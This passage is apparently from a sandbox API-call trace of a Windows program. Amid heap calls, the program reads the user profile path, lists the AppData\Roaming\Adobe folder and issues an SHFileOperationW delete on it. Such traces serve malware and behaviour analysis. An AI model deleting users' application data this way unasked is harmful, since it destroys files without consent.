lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0190.913] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.914] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.915] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.915] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0190.915] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.915] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.916] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.916] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.916] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0190.917] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0190.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Adobe", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe", lpFilePart=0x8bedfc*="Adobe") returned 0x33 [0190.917] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0190.917] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe")) returned 0x2010 [0190.918] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa58a0 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="Flash Player", cAlternateFileName="FLASHP~1")) returned 1 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="Headlights", cAlternateFileName="HEADLI~1")) returned 1 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 1 [0191.257] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x89c, dwReserved1=0x4, cFileName="LogTransport2", cAlternateFileName="LOGTRA~1")) returned 0 [0191.257] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0191.258] GetLastError () returned 0x12 [0191.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0191.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0191.258] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0191.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0191.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0191.259] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0191.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0191.259] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0191.259] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0191.259] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0191.259] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16e8 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0191.260] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0191.260] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0191.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x68) returned 0x24202f0 [0191.261] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/Adobe", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe", lpFilePart=0x8bf658*="Adobe") returned 0x33 [0191.261] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0191.261] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\adobe")) returned 0x2010 [0191.261] SHFileOperationW (in: lpFileOp=0x8bf870*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="\x7df2\x3dce\xc953\x484b\xd76e\xe3ef\x12ec\xf625\xe82c\x52a5\x67f1\x1d01\xa1c1\x7217\x3768\xe797\xfa35\xb619\x4322\xe113\x621c\xe57c\x2e40\xac0e\x4cf3\x12c9\x9f9c\xf6cf\xea42\xc4dc\x2580\x29fc\xddc6\xa843\xa662\xda1d\xf9cb\xc236\xf1eb\x9835\xee68\xf283\xbc77\xe588\x25bf\x1080\x27fe\xbf0f\x17b6\x29ad\x69f\x9aec\x5ba7\xa4df\x4fd1\xf3b1\xd9c0\xc1be\x5667\xe6ac\x8b48\xcfc2\xb600\xdf1d\xb1cf\x76d\xd83c\x33b0\x11c\x14bf\x4751\x2a30\xa209\xfbd6\xc340\xc455\xd518\xf8c3\x3042\x4970\x3d83\x8579\x1a18\x7801\x1d\xdd2a\x52c5\x9b4f\x3c26\xb4cd\xbdac\x3088\x4530\x84c5\xce6b\xf6c6\xce3c\xefbb\x6f50\xf3e7\xc885\xb7bb\x4ee3\x3f28\x4742\xe8c0\x850f\xc415\x4dba\x8e6e\x17df\x7be0\x9653\x8860\x639f\x6801\xb053\x624f\x7b42\x7d9b\xf696\x9b36\x953d\xd5cc\x81a9\x413c\x55da\x7bb3\x53a9\xd665\x5b38\x74c3\x1961\x336c\xc94e\x9581\xe56c\x9cb5\x1310\x6bb3\xae3a\x4643\x34d6\x8456\x559\xc200\xec1d\x81c1\x9ac8\xdbaf\x97c3\x9ca9\x8017\x3702\xc0de\xefdf\xe5b\x8bef\xee78\x1287\x7f59\xdd4c\xcccc\xc5c\x1b2f\xfece\x8e39\xcbf\x4584\x1f67\xa8c\x9894\xda6c\x86af\x1d2c\x713b\x8ac4\x5d20\x4778\xdee5\x34c0\x1f6a\xb10a\x3d80\x3d8f\xfc0c\x6cdd\xda0c\x2193\x9b9c\xec76\xdc61\x62f0\x216b\xeb33\xa77\x6e6\x2a4\xcb27\x7c84\x4fec\x44d0\xdff6\xb8b1\x43e2\x6ae4\xbc63\x97f3\x80\x12fa\x8216\xf0b8\xc603\x4b29\x4ee0\xfa9a\xbdfd\xbed0\x8349\x8f9\x6e06\xbcdb\x560c\x10d5\xd991\x7d87\x7ba3\x4a8f\x8385\x59af\x34ad\x15b5\x5ed3\x9837\x3dd3\xf78c\xecc0\xecbd\x6c87\xf7ec\x5aaf\x925\x6a96\x9603\xf0ea\x5640\x1fde\x6b28\xcc1f\x719a\xaca\xd623\xbec4\x231d\x6249\xce0e\x5196\xb6a2\x6478\xc70f\xa471\x6ced\x38df\x4a94\x281a\xf0a0\xb3ee\xea2d\x20e8\x6b84\xdd1a\x824e\x5db3\x305a\x3d2f\x858\x867c\x2238\xa0d6\x3f42\xab52\x8f46\x95f3\x583c\xd58\x571d\x8772\x3fb5\x7b84\x30c1\x7b75\xb251\x37ca\x6e8d\x2979\xb8a0\xfabd\x8133\x4938\x9f74\x4ad9\x115b\x2a07\xeaf7\x3483\x4f5a\xa1f7\xf2a0\x702d\x48db\x98b4\x27fa\xa2b8\x811c\xfe6e\xa018\x8dd\x4e35\x81cb\x206b\x9009\x7d4f\x5ef6\xfd84\x601e\xc0b1\xc8eb\xa9b4\x727d\xb6b4\xc028\x56c\x67de\x4e37\x35b\xc5d7\x2d0a\xb487\xac20\x8d34\xa16c\x8327\x9880\x85fa\xd390\xc919\x8ce9\x8326\xf2d6\x698a\x8803\xc042\x9f06\x5777\xd189\x442d\x515b\x79dd\x1ed\x96b4\x389c\xfe44\xee8c\xa029\xaf84\xe75f\x6624\xc54d\xfd5e\x57ae\x313\xf8df\xcdab\xfc33\x956f\x8b7f\xf324\x72bf\x9d42\xb9b8\xd461\x3438\xeeb\x6272\x3faf\x8f7b\xe47f\x1d3e\xb474\x6ec2\x37c8\xa2b5\x9f4b\x6a44\x70b